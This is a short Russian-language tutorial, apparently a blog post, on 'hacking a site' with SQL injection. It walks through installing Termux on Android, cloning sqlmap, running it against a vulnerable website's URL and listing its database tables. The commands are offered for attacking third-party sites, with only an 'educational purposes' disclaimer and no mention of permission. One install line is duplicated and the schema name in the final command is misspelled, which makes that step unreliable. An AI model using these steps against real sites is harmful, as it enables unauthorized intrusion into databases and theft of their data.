Взлом сайта при помощи SQL инъекции

Всех приветствую! SQLmap — утилита для взлома сайта при помощи SQL инъекции.

Прошу обратить внимание! Автор данной статьи не несёт ответственности за любые последствия вслед использования предоставленной информации. Все материалы опубликованы исключительно в образовательных целях!

Инструкция:

1. Скачиваем termux (google play или 4pda).

Заходим в терминал termux и вводим следующие команды:

apt update -y && apt upgrade -y
apt install python2 git -y
apt install python2 git -y

Клонируем репозиторий

git clone https://github.com/sqlmapproject/sqlmap.git

Переходим в директорию:

cd sqlmap

 Запускаем:

python2 sqlmap.py -u <url уязвимого веб-сайта>

Более подробно про все виды атак вы можете почитать на странице github, их там очень много. Но самый интересный, как по мне, informationschema, ибо он позволяет посмотреть все таблицы в БД.

python2 sqlmap.py -u <url уязвимого веб-сайта> -D informationschema --tables